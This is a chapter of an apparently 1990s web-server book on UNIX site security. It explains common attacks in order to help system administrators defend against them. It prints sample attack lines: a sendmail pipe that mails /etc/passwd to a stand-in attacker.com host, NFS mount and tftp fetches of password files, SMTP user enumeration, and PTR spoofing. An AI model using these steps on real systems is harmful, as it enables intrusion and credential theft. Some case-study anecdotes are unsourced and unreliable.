Chapter 40

Site Security


Chapter 17, "How to Keep Portions of the Site Private," tells you what individual Webmasters can do to enhance the security of their Web site. Closing the door to HTTP infiltrators is of little use, however, if infiltrators can penetrate the site through FTP, sendmail, or Telnet. This chapter covers the steps the system administrator can take to make the site more resistant to attack.

Much of the material in this chapter provides explicit tips about how to attack a UNIX system. Some of this material is obsolete (though it may still apply to systems that have not had recent upgrades). All of this material is already widely disseminated among people who are inclined to attack systems. It is provided here so that system administrators can be aware of what kinds of attacks are likely to be made.

Overview

Figure 40.1 shows again the triangle of competing objectives introduced in Chapter 17, "How to Keep Portions of the Site Private."

Figure 40.1 : The security-performance-usability triangle.

With few exceptions, every step toward enhanced security is a step away from high performance and usability. Each system administrator, in concert with the Webmasters of the sites on the system, must determine where the acceptable operating points lie.

This chapter focuses on UNIX since most Web sites are hosted on UNIX servers. UNIX is one of the most powerful operating systems in common use and with that power comes vulnerability.

Other operating systems, such as the various members of the Windows family, have somewhat less functionality and are consequently a bit less vulnerable. The Macintosh is unique in that it has no command-line interface, so it is more resistant to certain kinds of attack.

Exposing the Threat

Many checks for vulnerability are left undone, even though they are simple and hardly detract from performance and usability. In many cases, the system administrator is unaware of the threat or believes that "it will never happen at my site."

A site need not be operated by a bank or a Fortune 500 company to have assets worth protecting. A site need not be used by the military for war planning to be considered worthy of attack. As the case studies in this section show, sometimes merely being connected to the Internet is enough to cause a site to be infiltrated.

Case Studies

Security needs to be a budgeted item just like maintenance or development. Depending upon the security stance, the budget may be quite small or run to considerable sums. In some organizations, management may need to be convinced that the threat is real. The following case studies illustrate how other sites have been attacked and compromised, as well as government analyses of threats and vulnerabilities.

The Morris Worm

On the evening of November 2, 1988, a program was released onto the Internet. It collected key information from each machine it reached and then broke into other machines by exploiting security holes in existing software. Once on a new system, the program started the process again.

Within hours, a large percentage of the hosts on the Internet were infected. Many system administrators responded by taking their sites offline, ironically making it impossible for them to get the information that told them how to eliminate the program.

The Morris Worm exploited two vulnerabilities. First, the fingerd daemon had a security hole in its input routine. When the input buffer was overflowed with carefully chosen data, the attacker got access to a privileged login shell.

Caution
Any program running as a privileged user should be double-checked to make sure all input is limited to the size of the input buffer.

The second security hole was in sendmail, the UNIX program that routes mail. Sendmail is notoriously difficult to configure, so the developers left a DEBUG feature in place to help system administrators. Many administrators chose to leave DEBUG turned on all the time, which allowed a user to issue a set of commands in place of a recipient's address. The result: an open door into a privileged shell.

The Morris Worm used several proven techniques to guess passwords. Too many users, and indeed too many system administrators, leave some passwords at vendor defaults. Or they make passwords short, all lowercase, or easy to guess from system or personal information. The freely available program Crack can be used by administrators against their own password file to reveal weak passwords.

WANK and OILZ Worms

During October and November 1989, two networks that form part of the Internet came under attack. The SPAN and HEPnet networks included many DEC VAXen running the VMS operating system. The initial attack, called the WANK Worm, targeted these VAXen. It played practical jokes on users, sent annoying messages, and penetrated system accounts.

The WANK Worm attacked only a few accounts on each machine to avoid detection. If it found a privileged account, it would invade the system and start again with systems reachable from the new host.

Within a few weeks, countermeasures were developed and installed that stopped the WANK Worm. The attackers responded with an improved version, called the OILZ Worm. The OILZ Worm fixed some problems with the WANK Worm and added exploitation of the default DECnet account. System administrators who had installed their DECnet software but left the vendor password in place soon found their systems infected.

Ship Sunk from Cyberspace

In March 1991, a ship in the Bay of Biscay was lost in a storm. Intruders had broken into the computers of the European Weather Forecasting Centre in Bracknell, Berkshire, and disabled the weather forecasting satellite that would have warned the crew of the impending storm.

Cancer Test Results Corrupted

In 1993, a group of intruders invaded a medical computer and changed the results of a cancer screening test from negative to positive, leading the patients involved to believe they had cancer.

$10,000,000 Stolen from CitiBank

Banks usually do not divulge major thefts, but security experts estimate that about 36 instances of computer theft of over $1,000,000 occur each year in Europe and the United States. One such case came to light when CitiBank requested the extradition of a cracker in St. Petersburg, Russia, for allegedly stealing more than $10,000,000 electronically.

This case is among those documented by Richard O. Hundley and Robert H. Anderson in their 1994 RAND report "Security in Cyberspace: An Emerging Challenge to Society."

Information Infrastructure Targets Listed

In recent years, the Pentagon has begun to talk seriously about Information Warfare (IW). The U.S. used IW techniques in the Gulf War against Iraq, with devastating success.

The July/August 1993 issue of Wired listed 10 Infrastructure Warfare Targets. At least three of these are clearly part of the information infrastructure. In his report "CSI Special Report on Information Warfare" for the Computer Security Institute in San Francisco, Richard Power interviewed Dr. Fred Cohen of Management Analytics (Hudson, Ohio), author of Protection and Security on the Information Superhighway.

Dr. Cohen gave detailed scenarios by which the Culpepper Telephone Switch (which carries all U.S. Federal funds transfers) and the Internet could be disrupted, at least temporarily. Dr. Cohen declined to describe attack strategies against the Worldwide Military Command and Control System (WWMCCS), stating, "It's too vital."

Pentagon and RAND Role-Play an Information War

In 1995, Roger C. Molander and a team of researchers at RAND conducted a series of exercises based on "The Day After…" methodology. RAND led six exercises designed to crystallize the government's understanding of information warfare.

In the scenario, a Middle East state makes a power grab for an oil-rich neighbor. To keep the U.S. from intervening, it launches an IW attack against the U.S. Computer-controlled telephone systems crash, a freight train and a passenger train are misrouted and collide, and computer-controlled pipelines malfunction, triggering oil refinery explosions and fires.

International funds-transfer networks are disrupted, causing stock markets to plummet. Phone systems and computers at U.S. military bases are jammed, making it difficult to deploy troops. The screens on some of the U.S.'s sophisticated electronic weapons begin to flicker as their software crumbles.

In the scenario, there is no smoking gun that points to the aggressor. The participants in the RAND study were asked to prepare their recommendations for the President in less than an hour. The good news is…

…as system administrators, we need only concern ourselves with keeping our few boxes safe.

Security Awareness

Many security holes can be closed by training staff and users in basic security procedures. Many crackers have acknowledged that it is far simpler to get key information out of human operators than to extract it through technical tricks and exploits. Here are a few ways crackers can exploit human security holes.

Forgetting Your Password

It has happened to everyone at some point. Returning after some weeks away, logging on to a system that you don't use on a regular basis, you draw a blank. You sit frozen, looking at the blinking cursor and the prompt, Enter Password:.

You were taught, "Never write your password down" and like a good soldier, you obeyed. Now you're locked out, it's 7:00 p.m., and the report due in the morning is on the other side of this digital watchdog.

Faced with this situation, many people call their service provider. Most system administration staff are well-enough trained not to give out the password. Indeed, on UNIX systems they cannot; the system stores only a one-way hash of each password, not the password itself.

But they will demand some piece of personal information as identification. The mother's maiden name is common. Once they have "identified" the caller to their satisfaction, they reset the password on the account to some known entry such as the username, and give out that password.

Note
One common choice for a password is to set the password to be the same as the username. Thus, the password for account jones might be jones. This practice is so common that it has a name: such accounts are called "joes."
When a user forgets a password, the system operator may set the password so the account is a joe. The user should immediately change the password to something that only he or she knows. Unfortunately, many users don't know how to change their own password, or ignore this guideline and leave their account as a joe. As a result, most systems have at least one joe through which an attacker can gain access.

There are no perfect solutions to this problem. One partial solution may be to encourage people to write their password down in a very private place. There are many stories of accounts being penetrated using the "I lost my password" story. There are no known cases of a password being stolen out of a wallet or purse.

If management decides that passwords will be reset to a known value on request, develop a procedure to handle the situation. Require some identifying information other than the mother's maiden name, and do not give the new password out on the inbound call.

Instead, tell the caller to hang up, and call the user back at the number on file in the records. Do not accept changes to those records by e-mail. Require that people confirm a change of address or phone number by fax or regular mail.

Caution
Never use the same password for two different systems. Instead, use a mnemonic hook that can be tailored for each system. To log into a system called "Everest," use a password like "Mts2Climb." For a system called "Vision," use "Glasses4Me." Even if the system only looks at the first eight characters, the passwords are unique and not easy to crack with a dictionary or a brute force attack.

Physical Security

For leaders of the paperless society, service providers and in-house system administrators generate a surprising amount of paper. Sooner or later, most of that paper ends up in the trash. Crackers have been known to comb through the garbage, finding printouts of configurations, listings of source code, even handwritten notes and interoffice memos that reveal key information useful for penetrating the system.

Other crackers, not motivated to dig through garbage cans, arrange a visit to the site. They may come as prospective clients or to interview for a position. They may hire on as a member of the custodial staff or even join the administrative staff.

Take a page from the military's book. Decide what kinds of documents hold sensitive information and give them a distinctive marking. Put them away in a safe place when not in use. Do not allow them to sit open on desktops. When the time comes for them to be destroyed, shred them.

Maintain a visitor's log. Get positive ID on everyone entering sensitive areas for any reason. Do a background check on prospective employees. Post a physical security checklist on the back of the door. Have the last person out check the building to make sure that doors and windows are locked, alarms set, and sensitive information has been put away. Then have them initial the sign-out sheet.

Caution
If your shop reuses old printouts as scratch paper, make sure that both sides are checked for sensitive information.

Whom Do You Trust?

Most modern computer systems establish a small (and sometimes not so small) ring of hosts that they "trust." This web of trust is convenient and increases usability. Instead of having to log in and provide a password for each of several machines, users can log in to their home machine and then move effortlessly throughout the local network. Clearly there are security implications here.

For example, on UNIX systems there is a file called /etc/hosts.equiv. Any host on that list is implicitly trusted. Some vendors ship systems with /etc/hosts.equiv set to trust everyone. Most versions of UNIX also allow a file called .rhosts in each user's home directory, which works like /etc/hosts.equiv.

The .rhosts file is read by the "r" commands, such as rlogin, rcp, rsh, and rexec. When user jones on host A attempts an r-command on host B as user smith, host B looks for a .rhosts file in the home directory of smith. Finding one, it checks whether user jones of host A is trusted. If so, the access is permitted.
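
The format is one trusted host per line, optionally followed by a remote username. A .rhosts file in smith's home directory might contain entries like these (the hostnames are hypothetical):

hostA.corp.example.com jones
hostC.corp.example.com

The first line lets jones on hostA log in as smith without a password; the second extends the same courtesy to whoever holds the smith account on hostC.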

All too often, a user will admit anyone from a particular host or will list dozens of hosts. One report, available at ftp://ftp.win.tue.nl/pub/security/admin-guide-to-cracking.101.Z, documents an informal survey of over 200 hosts with 40,000 accounts. About 10 percent of these accounts had a .rhosts file. These files averaged six trusted hosts each.

Many .rhosts had over 100 entries. More than one had over 500 entries! Using .rhosts, any user can open a hole in security. One can conclude that virtually every host on the Internet trusts some other machine and so is vulnerable.

The author of the report points out that these sites were not typical. They were chosen because their administrators are knowledgeable about security. Many write security programs. In many cases, the sites were operated by organizations that do security research or provide security products. In other words, these sites may be among the best on the Internet.

Whom Do You Trust? Part II

Even if a site has /etc/hosts.equiv and .rhosts under control, there are still vulnerabilities in the "trusting" mechanisms. Take the case of the Network File System, or NFS. One popular book on UNIX says of NFS, "You can use the remote file system as easily as if it were on your local computer." That is exactly correct, and that ease of use applies to the cracker as well as the legitimate user.

On many systems, the utility showmount is available to outside users. showmount -e reveals the export list for a host. If the export list is everyone, all crackers have to do is mount the volume remotely. If the volume has users' home directories, crackers can add a .rhosts file, allowing them to log on at any time without a password.
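
An administrator can check a server's exposure from an outside machine with the same commands a cracker would use (victim.com and the export path are placeholders; NFS mount syntax varies slightly among UNIX flavors):

showmount -e victim.com              # list exported file systems and who may mount them
mount victim.com:/export/home /mnt   # if the export list says "everyone," any outside host can do this
ls -la /mnt/*/.rhosts                # users' .rhosts files are now readable, and possibly writable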

If the volume doesn't have users' home directories, it may have user commands. Crackers can substitute a Trojan horse, a program that looks like a legitimate user command but really contains code to open a security hole for the cracker. As soon as a privileged user runs one of these programs, the cracker is in.

Tip
Export file systems only to known, trusted hosts. When possible, export file systems read-only. Enforce the same rule on users who use .rhosts: trust only known hosts, and as few of them as possible.

Openings Through Trusted Programs

Recall that the Morris Worm used security holes in "safe" programs, programs that had been part of UNIX for years. Although sendmail has been patched, there are other ways that standard products can contribute to a breach.

The finger daemon, fingerd, is often left running on systems that have no need for it. Using finger, a cracker can find out who is logged on. (Crackers are less likely to be noticed when there are few users around.)

Finger can also tell a remote user about certain services. For example, if a system has a user named www or http, it is likely to be running a Web server. If a system has a user named ftp, it probably serves anonymous FTP.
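
Both checks take a single command (victim.com is a placeholder here):

finger @victim.com        # who is logged in right now?
finger www@victim.com     # does an account named www exist?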

If a site has anonymous FTP, it may have been configured incorrectly. Anonymous FTP is run inside a "silver bubble": the system administrator executes the chroot() command to seal off the rest of the system from FTP. Inside the silver bubble, the administrator must supply stripped-down versions of the files a UNIX program expects to see, including /etc/passwd.

A careless administrator might just copy the live /etc/passwd into the FTP area. With a list of usernames, crackers can begin guessing passwords. If the file includes the encrypted passwords, all the better (from the cracker's point of view): crackers can copy the file back to their own machines and attack the passwords without arousing the suspicion of the administrator.

Tip
Make sure that ~ftp and all system directories and files below ~ftp are owned by root and are not writable by any user.
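
A quick audit along the lines of this tip might look like the following sketch (replace ~ftp with the actual anonymous FTP home directory if the shell does not expand it):

find ~ftp -perm -0002 -print    # list anything world-writable under the FTP area
ls -ld ~ftp ~ftp/bin ~ftp/etc   # these should be owned by root and not writable by ftp
cat ~ftp/etc/passwd             # should hold dummy entries only, never real password hashes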

If the system administrator has turned off fingerd, the cracker can exploit rusers instead. rusers gives a list of users who are logged on to the remote machine. Crackers can use this information to pick a time when detection is unlikely. They can also build up a list of names to use in a password-cracking assault.

Systems that serve diskless workstations often run a simple program called tftp, the Trivial File Transfer Protocol daemon. tftp does not support passwords. If tftp is running, crackers can often fetch any file they want, including the password file.
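
Administrators can probe their own systems the same way a cracker would (victim.com is a placeholder; on a properly restricted server the get should fail):

tftp victim.com
tftp> get /etc/passwd /tmp/passwd.copy
tftp> quit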

The e-mail server is a source of information to the cracker. Mail is transferred over TCP networks using "mail transfer agents" (MTAs) such as sendmail. MTAs communicate using the simple mail transfer protocol (SMTP). By impersonating an MTA, a cracker can learn a lot about who uses a system.

SMTP supports two commands (VRFY and EXPN), which are intended to supply information rather than transfer mail. VRFY verifies that an address is good. EXPN expands a mailing list without actually sending any mail. For example, a cracker knows that sendmail is listening on port 25 and can type:

telnet victim.com 25

The target machine responds

220 dse Sendmail AIX 3.2/UCB 5.64/4.03 ready at 20 Mar 1996 13:40:31 -0600

Now the cracker is talking to sendmail. The cracker asks sendmail to verify some accounts. (-> denotes characters typed by the cracker, and <- denotes the system's response):

->vrfy ftp
<-550 ftp... User unknown: No such file or directory
<-sendmail daemon: ftp... User unknown::No such file or directory

->vrfy trung
<-250 Trung Do x1677 <trung>

->vrfy mikem
<-250 Mike Morgan x7733 <mikem>

Within a few seconds, the cracker has established that there is no FTP user but that trung and mikem both exist. Based on knowledge of the organization, the cracker guesses that one or both of these individuals may be privileged users.

Now the cracker tries to find out where these individuals receive their mail. Many versions of sendmail treat expn just like vrfy, but some give more information:

->expn trung
<-250 Trung Do x1677 <trung>

->expn mikem
<-250 Mike Morgan x7733 <mikem@elsewhere.net>

The cracker has established that mikem's mail is being forwarded, and now knows the forwarding address. mikem may be away for an extended period. Attacks on his account may go unnoticed.

Here's another sendmail attack. It has been patched in recent versions of sendmail, but older copies are still vulnerable. The cracker types:

telnet victim.com 25
mail from: "|/bin/mail warlord@attacker.com < /etc/passwd"

Older versions of sendmail would complain that the user was unknown but would cheerfully send the password file back to the attacker.

Another program built into most versions of UNIX is rpcinfo. When run with the -p switch, rpcinfo reveals which RPC services a host provides. If the target is a Network Information System (NIS) server, the cracker is all but in; NIS offers numerous opportunities to breach security. If the target offers rexd, the cracker can simply ask it to run commands; rexd does not look in /etc/hosts.equiv or .rhosts.
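
Checking what a host advertises takes one command; run it against your own servers before someone else does (victim.com is a placeholder):

rpcinfo -p victim.com    # lists registered RPC services: NFS, ypserv, rexd, bootparam, and so on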

If the server is connected to diskless workstations, rpcinfo shows it running bootparam. By asking bootparam for BOOTPARAMPROC_WHOAMI, crackers get the NIS domainname. Once crackers have the domainname, they can fetch arbitrary NIS maps, such as the password map.

Security Holes in the Network Information System

The Network Information System (NIS), formerly the Yellow Pages, is a powerful tool and can be used by crackers to get full access to the system. If the cracker can get access to the NIS server, it is only a short step to controlling all client machines.

Tip
Don't run NIS. If you must run NIS, choose a domainname that is difficult to guess. Note that the NIS domainname has nothing to do with the Internet domain name, such as www.yahoo.com.

NIS clients and servers do not authenticate each other. Once crackers have guessed the domainname, they can put mail aliases on the server to do arbitrary things (like mail back the password file). Once crackers have penetrated a server, they can read the files that show which machines are trusted and then attack any machine that trusts another.

Even if the system administrator has been careful to prune down /etc/hosts.equiv and has restricted the use of .rhosts, and even if only a single other machine is trusted, the cracker can spoof the target into thinking the cracker's machine is the trusted one.

If a cracker controls the NIS master, he or she can edit the host database to tell every client that the cracker's machine, too, is trusted. Another trick is to write a replacement for ypserv. The ypbind daemon can be tricked into using this fake version instead of the real one.

Since the cracker controls the fake, the cracker can add his or her own information to the password file. More sophisticated attacks rely on sniffing the NIS packets off the Net and providing a faked response.

Still another hole in NIS comes from the way /etc/passwd can be incorrectly configured. When a site runs NIS, it puts a plus sign in the /etc/passwd file to tell the system to consult NIS about passwords. Some system administrators erroneously put that plus sign in the /etc/passwd file that they export, effectively creating a new user named '+'.
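
The dangerous entry is easy to overlook. In a password file it typically appears as:

+::0:0:::

When NIS is consulted properly, that line merely tells the library routines to look in the NIS maps. Mishandled, however, some login implementations accept + as an ordinary account name with no password.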

If the system administrator uses DNS instead of NIS, crackers must work a bit harder. Suppose crackers have discovered that victim.com trusts friend.net. They change the Domain Name Server pointer (the PTR record) on their net to claim that their machine is really friend.net. If the original record says:

1.192.192.192.in-addr.arpa  IN  PTR  attacker.com

they change it to read

1.192.192.192.in-addr.arpa  IN  PTR  friend.net

If victim.com does not check the IP address but trusts the PTR record, victim.com now believes that commands from attacker.com actually come from the trusted friend.net, and the cracker is in.

Additional Resources to Aid Site Security

The current network world has been likened to the wild West. Most people are law-abiding, but there are enough bad guys to keep everyone on their toes. There is no central authority that can keep the peace. Each community needs to take steps to protect itself.

Chapter 17, "How to Keep Portions of the Site Private," tells you what the individual "storekeeper" can do to keep a site secure. This chapter tells you what the system administrator can do. Many of the cracking techniques described in this chapter are obsolete. Newer versions of UNIX have fixed those holes, but new vulnerabilities are being found every day.

This section shows where to turn for more security tips and warnings.

Mailing lists are another good way to keep up with the topics in this chapter. The Firewalls mailing list, for example, is joined by sending a subscription request whose message body contains the line

subscribe firewalls

to the list's server.

For some good ideas on how the military maintains physical security, visit Dave's Dept of the Army Security Stuff site at http://www.ccaws.redstone.army.mil/security/mainsec.htm.

To catch up on the latest security advisories, point your browser at the DOE's Computer Incident Advisory Capability (CIAC), http://ciac.llnl.gov/ciac/documents/index.html. This site includes notices from UNIX vendors as well as reports from the field.

http://www.tezcat.com/web/security/security_top_level.html attempts to provide "one-stop shopping" for everything related to computer security. They do a creditable job and are worth a visit.

For an eye-opener about vulnerabilities in your favorite products, visit http://www.c2.org/hacknetscape/, http://www.c2.org/hackjava/, http://www.c2.org/hackecash/, and http://www.c2.org/hackmsoft/.

More general information is available from the Computer Operations, Audit, and Security Technology (COAST) project at Purdue University: http://www.cs.purdue.edu/coast/coast.html. These are the folks who produce Tripwire.

Danny Smith of the University of Queensland in Australia has written several papers on the topics covered in this chapter. "Enhancing the Security of UNIX Systems" covers specific attacks and the coding practices that defeat them. "Operational Security-Occurrences and Defence" is a summary of the major points of his other papers. These and other papers on this topic are archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

Rob McMillan, also at the University of Queensland, wrote "Site Security Policy." This paper can be used as the framework within which to write a Computer Security Policy for a specific organization. It is also archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

Forming an Incident Response Team

Many system administrators are concerned about security but are so overwhelmed by their day-to-day tasks that they have no time to close or tighten vulnerabilities. Their first brush with security comes when someone at another site reports that their system is being used to conduct break-ins.

By then, much damage has been done. Passwords have been stolen and cracked, the NIS domainname is known, and Trojan horses have been planted. But the system administrator's day-to-day tasks have not diminished, and the security issues still do not get the attention he or she knows they deserve.

Many sites anticipate these problems by forming an Incident Response Team (IRT). These sites close as many vulnerabilities as they can, continually scan logs for evidence of attempted break-ins, and monitor news such as the CERT advisories to make sure they benefit from others' experience.

When and if they are attacked, the members of the Incident Response Team have the authority and the responsibility to stop the attack and close the security hole. Not incidentally, they serve as the point of contact between the site-owning organization and law enforcement agencies.

Why Form an Incident Response Team?

In his excellent paper, "Forming an Incident Response Team," Danny Smith lists eight reasons to have an Incident Response Team.

IRTs can be formed at the national, corporate, and local levels. The size of the constituency is in part a function of the value of the assets to be protected. A bank may decide to have an IRT for their online services department. A general merchandise vendor can share an IRT with other merchants on their host.

Newly formed IRTs must announce their presence and their mission to their constituency. They can expect lackluster response at best. Many system administrators find it so hard to keep their sites running that they can scarcely imagine keeping their sites secure.

To identify constituent sites, Smith recommends asking each site to register and to name a 24-hour contact who can be called in case of an emergency. The 24-hour contact may or may not be the same as the "registered site security contact," who is the recipient of security information, including warnings of break-in attempts and notices of security holes.

For obvious reasons, the name of the 24-hour contact must be independently verified. The contact must have the authority to make decisions or to call in key decision-makers regardless of the time of day. The 24-hour contact is often a technically minded person in the organization's security office.

During an investigation, the IRT may have to communicate information about a site's name and configuration to other sites. It is best to get permission to do this ahead of time so that no time is lost when pursuing an attacker.

(For a real-life account of pursuing a cracker in real time, see Cliff Stoll's The Cuckoo's Egg or Bill Cheswick's "An Evening with Berferd In Which a Cracker Is Lured, Endured, and Studied," available at ftp://ftp.research.att.com/dist/internet_security/berferd.ps.)

Before any incident, the IRT must work out a secure means of communications with the site. If the site has been compromised, it may have disconnected from the Net.

The IRT may have to communicate with a different machine (by encrypted e-mail) or resort to phone or fax. The IRT should also anticipate that an übercracker may issue false advisories in the name of the IRT in order to force open a security hole.

Smith has specific recommendations about the size and staffing of the IRT. His experience at Australia's SERT leads him to conclude that one full-time staff member can handle about one new incident per day, with roughly 20 incidents open at any time.

He also provides specific guidance relating to budget, policies, and training. His paper is exceptionally complete and is a must-read for anyone setting up an IRT. It also serves as a good beginning for a complete operations manual for such a team.

Smith also identifies five potential savings that come from forming an IRT.

Checklist for Site Security

Several good checklists pointing out possible vulnerabilities are available on the Net or in the literature.

File Permissions on Server and Document Roots

Common advice on the Web warns Webmasters not to "run their server as root." This caution has led to some confusion. By convention, Web browsers connect to TCP port 80, and on UNIX only root can open port 80 (like all ports below 1024).

So user root must start httpd if the server is to offer HTTP on port 80. Once httpd is started, it forks several copies of itself that are used to satisfy clients' requests. These copies should not run as root; it is common instead to run them as the unprivileged user "nobody."
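
In NCSA-derived servers, this arrangement is set in the server configuration file. A typical fragment looks like the following (the unprivileged group name varies from system to system):

Port 80
User nobody
Group nogroup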

One good practice is to set up a special user and group to own the Web site. Here is one such configuration:

drwxr-xr-x  5 www www   1024 Feb 21 00:01 cgi-bin/
drwxr-x---  2 www www   1024 Feb 21 00:01 conf/
-rwx------  1 www www 109674 Feb 21 00:01 httpd
drwxrwxr-x  2 www www   1024 Feb 21 00:01 htdocs/
drwxrwxr-x  2 www www   1024 Feb 21 00:01 icons/
drwxr-x---  2 www www   1024 Feb 21 00:01 logs/

In this example, the site is owned by user "www" of group "www." The cgi-bin directory is world-readable and executable, but only the site administrator can add or modify CGI Scripts. The configuration files are locked away from non-www users completely, as is the httpd binary. The document root and icons are world-readable. The logs are protected.
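
A sketch of the commands that produce a layout like the one above, assuming the site lives in /usr/local/www (the path is illustrative, and some older systems write the owner and group as www.www rather than www:www):

cd /usr/local/www
chown -R www:www .        # give the whole tree to the www user and group
chmod 755 cgi-bin         # world-readable and searchable; only www may add scripts
chmod 750 conf logs       # hidden from users outside the www group
chmod 700 httpd           # only the owner may read or replace the binary
chmod 775 htdocs icons    # world-readable documents; the www group may update them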

On some sites, it is appropriate to grant write access to the cgi-bin directory to trusted authors, or to grant read access to the logs to selected users. Such decisions are part of the tradeoff between usability and security discussed in Chapter 17, "How to Keep Portions of the Site Private."

Optional Server Features

Another such tradeoff is in the area of optional server features. Automatic directory listings, symbolic link following, and Server-Side Includes (especially exec) each afford visibility and control to a potential cracker. The site administrator must weigh the needs of security against users' requests for flexibility.

Freezing the System: Tripwire

One common cracker trick is to infiltrate the system as a non-privileged user, change the search path so that the cracker's version of some common command, such as ls, gets run by default, and then wait for a privileged user to run that command. Such programs, called "Trojan horses," can be introduced to the site in many ways.

Here's one way to defend against this attack. Install a clean version of the operating system and associated utilities. Before opening the site to the network, run Tripwire, available from ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/. Tripwire calculates checksums for key system files and programs.

Print out a copy of the checksums and store it in a safe place. Save a copy to a disk, such as a diskette, that can be write-locked. After the site is connected to the Net, schedule Tripwire to run from the crontab; it will report any changes to the files it watches.
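
A minimal sketch of that routine, assuming the classic academic Tripwire (flag names, database locations, and crontab details vary between releases, so check the documentation that comes with the distribution):

tripwire -initialize      # build the baseline database of checksums
# copy the resulting database to write-locked media and print a copy for the safe
# then run a nightly integrity check from root's crontab and mail the report:
0 3 * * *  /usr/local/bin/tripwire | mail root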

Another good check is to visually inspect the server's access and error logs. Scan for UNIX commands like rm, login, and /bin/sh. Look for anyone trying to invoke Perl. Watch for extremely long lines in URLs.
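
A few lines of shell make a reasonable first pass over the logs (the log paths are illustrative; substitute your server's locations):

egrep 'rm |/bin/sh|login|perl' /usr/local/etc/httpd/logs/access_log
egrep 'rm |/bin/sh|login|perl' /usr/local/etc/httpd/logs/error_log
awk 'length($0) > 1024' /usr/local/etc/httpd/logs/access_log    # suspiciously long request lines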

Chapter 17, "How to Keep Portions of the Site Private," shows how a C or C++ program can have its buffer overflow. Crackers know that a common buffer size is 1,024. They will attempt to send many times that number of characters to a POST script to crash it.

If your site uses access.conf or .htaccess for user authentication, look for repeated attempts to guess the password. Better still, put in your own authenticator, like the one in Chapter 17, and limit the number of times a user can guess the password before the username is disabled.

Checking File Permissions Automatically

The Computer Oracle and Password System (COPS) is a set of programs that report file, directory, and device permissions problems. It also examines the password and group files, the UNIX startup files, anonymous FTP configuration, and many other potential security holes.

COPS includes the Kuang Rule-Based Security Checker, an expert system that tries to find links from the outside world to the superuser account. Kuang can find obscure links. For example, given the goal, "become superuser," Kuang may report a path like:

member workGrp,
write ~jones/.cshrc,
member staff,
write /etc,
replace /etc/passwd,
become root.

This sequence says that if an attacker can crack the account of a user who is a member of group workGrp, the cracker could write to the startup file used by user jones. The next time jones logs in, those commands are run with the privileges of jones.

jones, in turn, is a member of the group staff, which can write to the /etc directory. The commands added to jones's startup file could replace /etc/passwd with a modified copy, giving the attacker a privileged account.

On a UNIX system with more than a few users, COPS is likely to find paths that allow an attack to succeed.

COPS is available at ftp://archive.cis.ohio-state.edu/pub/cops/1.04+.

CRACK

CRACK is a powerful password cracker. It is the sort of program that attackers use if they can get a copy of a site's password file. Given a set of dictionaries and a password file, CRACK can often find 25 to 50 percent of the passwords on a site in just a few hours.

CRACK uses the gecos information in the password file, words from the dictionary, and common passwords like qwerty and drowssap (password spelled backward). CRACK can spread its load out over a network, so it can work on large password files by using the combined power of many machines.
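
Usage is simple, although option names and report locations vary between releases; see the README that accompanies the distribution. A typical run looks something like this:

cp /etc/passwd /tmp/passwd.copy    # always work on a copy of the password file
Crack /tmp/passwd.copy             # start the cracking run; results appear in Crack's report files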

CRACK is available at ftp://ftp.uu.net/usenet/comp.sources.misc/volume28.

TAMU Tiger

Texas A&M University distributes a program similar to a combination of COPS and Tripwire. It scans a UNIX system as COPS does, looking for holes. It also checksums system binaries like Tripwire. For extra security, consider using all three-Tiger, COPS, and Tripwire.

Source for various tools in the TAMU security project is archived at ftp://net.tamu.edu/pub/security/TAMU.

xinetd

UNIX comes with a daemon called inetd, which is responsible for managing the TCP "front door" of the machine. Clearly, inetd could play a role in securing a site, but the conventional version of inetd has no provision for user authentication. A service such as Telnet or FTP is either on or off.

To fill this need, Panagiotis Tsirigotis (panos@cs.colorado.edu) developed the "extended inetd," or xinetd. The latest source is available at ftp://mystique.cs.colorado.edu. The file is named xinetd-2.1.4.tar and contains a README file showing the latest information.

Configuring xinetd

Once xinetd has been downloaded and installed, each service is configured with an entry in the xinetd.conf file. The entries have the form:

service <service_name>
{
 <attribute> <assign_op> <value> <value> ...
}

Each entry names a service and assigns values to attributes such as the socket type, the protocol, the user the server runs as, and the pathname of the server program. The attributes most useful for security are the access control directives: only_from, no_access, access_times, and disabled.

only_from and no_access take hostnames, IP addresses, and wildcards as values. access_times takes, of course, time ranges. disabled turns the service off completely and also turns off logging of access attempts.

Tip
Do not use disabled to turn off a service. Instead, use no_access = 0.0.0.0. That way, attempts to access the service are still logged, giving early warning of a possible attack.
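
Putting these directives together, an entry that restricts Telnet to local addresses and business hours might look like the following sketch (the addresses, times, and server path are illustrative):

service telnet
{
     socket_type  = stream
     protocol     = tcp
     wait         = no
     user         = root
     server       = /usr/etc/in.telnetd
     only_from    = 199.199.0.0
     access_times = 7:00-19:00
}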

Detecting Break-In Attempts

As this chapter shows, cracking a system is an inexact art. The cracker probes areas of likely vulnerability. When one of the probes succeeds (and a determined cracker almost always gets in eventually), the cracker's first order of business is to clean up the evidence of the break-in attempts.

By logging unsuccessful attempts and examining the logs frequently, the system administrator can catch some of these break-in attempts and alert the IRT.

After watching the xinetd log for a while, system administrators begin to notice patterns of use and can design filters and tools that alert them when the log's behavior deviates from the pattern.

For example, a simple filter to detect failed attempts can be built in one line:

grep "FAIL" /var/log/xinetd.log

Each failure line gives the time, the service, and the address from which the attempt was made. A typical pattern for a site with a public httpd server might be infrequent failures of httpd (since it would usually not have any access restrictions) and somewhat more frequent failures of other services.

For example, if the system administrator has restricted Telnet to the time period of 7:00 a.m. to 7:00 p.m., there will be a certain number of failed attempts in the mid-evening and occasionally late at night.

Suppose the system administrator determines that any attempt to Telnet from outside the 199.199.0.0 network is unusual, and that more than one failed Telnet attempt between midnight and 7:00 a.m. is unusual. A simple Perl script could split the time field and examine the values; it could also count the number of incidents (or pipe the result out to wc -l).
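
The same check can be sketched with a line or two of shell and awk rather than Perl (the log path is illustrative, and the script assumes only that each failure line carries an hh:mm:ss timestamp and the service name):

grep FAIL /var/log/xinetd.log | grep telnet |
awk '{ if (match($0, /[0-9][0-9]:[0-9][0-9]:[0-9][0-9]/)) {
         hour = substr($0, RSTART, 2) + 0     # the hour from the first hh:mm:ss on the line
         if (hour < 7) count++
       }
     }
     END { print count + 0, "failed telnet attempts between midnight and 7:00 a.m." }'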

Another good check is to have the script note the time gap between entries. A maximum allowable gap is site-specific and varies as the day goes on. Large gaps are evidence that some entries may have been erased from the log and should serve as warnings.

Such a script could be put into the crontab, but an attacker is likely to check for security programs there. If the system supports personal crontabs, consider putting this script in the crontab of a random user.

